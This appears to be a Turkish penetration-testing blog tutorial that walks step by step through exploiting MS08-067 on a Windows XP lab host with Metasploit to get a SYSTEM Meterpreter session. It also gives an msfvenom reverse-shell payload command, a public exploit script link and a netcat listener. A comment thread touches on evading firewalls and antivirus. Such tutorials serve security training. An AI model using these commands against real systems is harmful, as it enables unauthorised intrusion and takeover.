MSF ms08_067_netapi İstismar Modülü ile İşletim Sistemi Zafiyetin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

2
1221
views
Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda Windows XP SPO işletim sisteminde MS08-067 zafiyetinin Metasploit Framework ile istismar edilecek ve SYSTEM hakları ile Meterpreter bağlantısı elde edilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Nessus ile zafiyet taraması sonucunda 192.168.244.138 IP adresli bilgisayarda MS08-067 zafiyetinin tespit edildiği görülmektedir.

acquiring-meterpreter-shell-on-windows-by-using-msf-ms08-067-netapi-module-01

Bu zafiyeti istismar etmek için Kali sağıtımı üzerindeki Metasploit Framework kullanılabilir. Bu işlem için öncelikle Kali’deki komut satırından MSF’in komut satırına erişilir.

msfconsole -q

Metasploit üzerinde ilgili modülün (MSF ms08_067_netapi istismar modülü) seçenekleri aşağıdaki gibidir:

search ms08-067
use exploit/windows/smb/ms08_067_netapi
show options

acquiring-meterpreter-shell-on-windows-by-using-msf-ms08-067-netapi-module-02

Seçenek olarak hedef IP adresinin ayarlanması yeterlidir. Böylece modül çalıştırılabilir.

set RHOST 192.168.244.138
show options
exploit

acquiring-meterpreter-shell-on-windows-by-using-msf-ms08-067-netapi-module-03

Modül çalıştırıldığında SYSTEM haklarıyla svchost.exe prosesine enjekte olunduğu görülmektedir.

sysinfo
getuid
getpid
ps

acquiring-meterpreter-shell-on-windows-by-using-msf-ms08-067-netapi-module-04

 

Not: MSF yerine Exploit-db içerisindeki Python kodu da kullanılabilirdi.

https://www.exploit-db.com/exploits/7132/

 

Not: Benzer olarak jivoi tarafından sunulan ms08-067.py isimli Python kodu içerisindeki Shellcode güncellenerek de ters bağlantı elde edilebilir.

  • İstismar Betiği: https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
  • Yeni ShellCode: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=3333 EXITFUNC=thread -b “\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40” -f c -a x86 –platform windows
  • İstismar: python ms08-067.py 10.10.10.9 445
  • Dinleyici: nc -lnvp 3333

 

Bu açıklıkla ilgili ayrıntılı bilgi için Bilgi Güvenliği Kapısı‘nda yayınlanan bağlantıdaki yazı incelenebilir.

 

Kaynaklar:

https://pentestworld.blogspot.com/2019/05/hack-box-legacy.html

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

2 YORUMLAR

  1. Hocam, güvenlik duvarı bu exploiti engelliyorsa nasıl bir yol izlememiz gerekiyor? Şöyle bir alıyorum; exploit complated but no Session was created.. karşı tarafta lokal olarak çalışan Windows sever 2003 var ve iis 6 olarak hizmet veriyor.

    Bir türlü bu exploit çalışmadı. Karşıda Kaspersky antivir calistigim içindir diye düşünüyorum :(

    • Merhaba

      Networksel olarak ilgili porta erişiminiz gerekir. Erişemezseniz istismar edemezsiniz.
      Ayrıca istismar edilebilecek zafiyetin de olması gerekir. Zafiyet yamanmış ise, istismar edemezsiniz.
      Kullandığınız istismar kodu uygun (OS sürümü, dili, mimarisi vs) olmalıdır.
      Eğer AV yakalıyorsa, AV’den kaçınma yollarından (AV bypass) birisini uygulamanız gerekir.

Webmaster için bir yanıt yazın İptal

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.